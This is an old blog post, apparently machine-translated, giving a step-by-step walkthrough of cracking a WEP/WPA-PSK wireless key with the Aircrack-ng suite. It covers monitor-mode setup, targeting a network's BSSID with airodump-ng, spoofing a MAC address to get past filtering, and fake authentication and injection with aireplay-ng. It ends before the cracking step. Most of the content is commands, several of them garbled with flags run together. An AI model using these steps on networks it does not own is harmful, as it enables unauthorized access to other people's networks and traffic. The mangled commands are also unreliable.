Saturday, September 25, 2010

Crack Wireless~ WEP / WPA key with Aircrack-ng suite

~Crack a WEP / WPA key with Aircrack-ng suite

This tips highlights a simple case to crack WEP / WPA-PSK. The aim is to familiarize you with the weaknesses of the wireless network. It requires an 802.11b / g with drivers previously patched for injection.

Introduction of tools

•Airmon-ng
Implement monitoring mode your wireless network card. Unnecessary here because airodump-ng does it automatically (provided that your card supports the mode!!)

•airodump-ng
We can find wireless networks with airodump-ng, it also allows to capture the flow of these networks, needed to find the key.

•aireplay-ng
This program will generate packages that will increase the traffic of the AP (Access Point). Often necessary to expose a WEP key.

•airolib-ng
Manager essid and hash table, this significantly enhances the bruteforce earning him valuable time.

•packetforge-ng
This tool will help us to develop an application (PRA in our case, but other protocols are available). By combining the attack with aireplay and this program, we can inject packets that will increase traffic accurately.

•Aircrack-ng
Aircrack-ng, implements the attack FMS (and others as further KoreK). It can break the WEP / WPA-PSK.
>>>>>

Configure the card in monitor mode

If your card does not appear in airmon-ng, then dedicated to configuring the network interface.
airmon-ng

Once your wireless network card is displayed, select the monitoring mode by typing:
airmon-ng start my_card_wlan

my_card_wlan is your wireless network interface (eg, rausb0, ra0, wifi0)


Finding networking

Initially, we made an inventory of networks around.
airodump-ng my_card_wlan

Once the network is identified, we re airodump, specifying exactly the network on which it will listen:
airodump-ng-w-d datafile BSSID my_card_wlan - channel_number


W-datafile datafile written to the file. Remember though this important file.
D-BSSID research focuses only on the given bssid.
- channel_number defines a specific channel on which to listen.

Once your list in hand, note the important information:
•ESSID (or identifier) of the PA.
•BSSID (or mac address) of the PA.
•STATION client connected to the network (note the mac address!).

>>>
Changing MAC address

This preliminary step allows you to "bypass" filter mac, conducted by the AP for security reasons. However it is not often applied. Several methods are available, but the network interface must be disabled prior your_interface ifconfig down.
•ifconfig
ifconfig - help
ifconfig [interface] hw ether 01:23:45:67:89
•ip
ip - help
ip link set [interface] address 01:23:45:67:89
•macchanger
macchanger - help
macchanger-m 01:23:45:67:89 [interface]
Packet Injection

Here, the sensitive stage of our procedure. We will generate traffic. If we are faced with WEP encryption, then we will try to boost the traffic of our IVs until the contrary for WPA, only a bit of traffic is necessary.

WEP

If you do not have a station connected, perform a fragmentation attack.


Authentication

First step for successful injection must join lest the ap ignore our packages (check this step for any questions on IVs that do not)
aireplay-ng -1 0-e ESSID-a BSSID-b BSSID-h MAC_CLIENT my_card_wlan
MAC_CLIENT is the mac address of the workstation connected to the PA (yours if no station is connected!). Note: For all orders of aireplay-ng, if you specify the essid then you can omit options related to the BSSID (-a,-b ...)

If the "Association Successful" does not appear, is that the PA may be sensitive to aireplay-ng packages or simply allowed the mac address is already connected.
Try this alternative, however, which is offered on the official site.
aireplay-ng -1 6000-o 1-q 10-e ESSID-h MAC_CLIENT my_card_wlan
6000 re-authenticate every 6000 seconds. A long period allows sending packet bearing the active connection (see "-q").
O-1 sends a single packet type, the default sending multiple packets may blur the PA.
Q-10 sends packets to keep the active connection every 10 seconds.

~thanX for Reading~

No comments: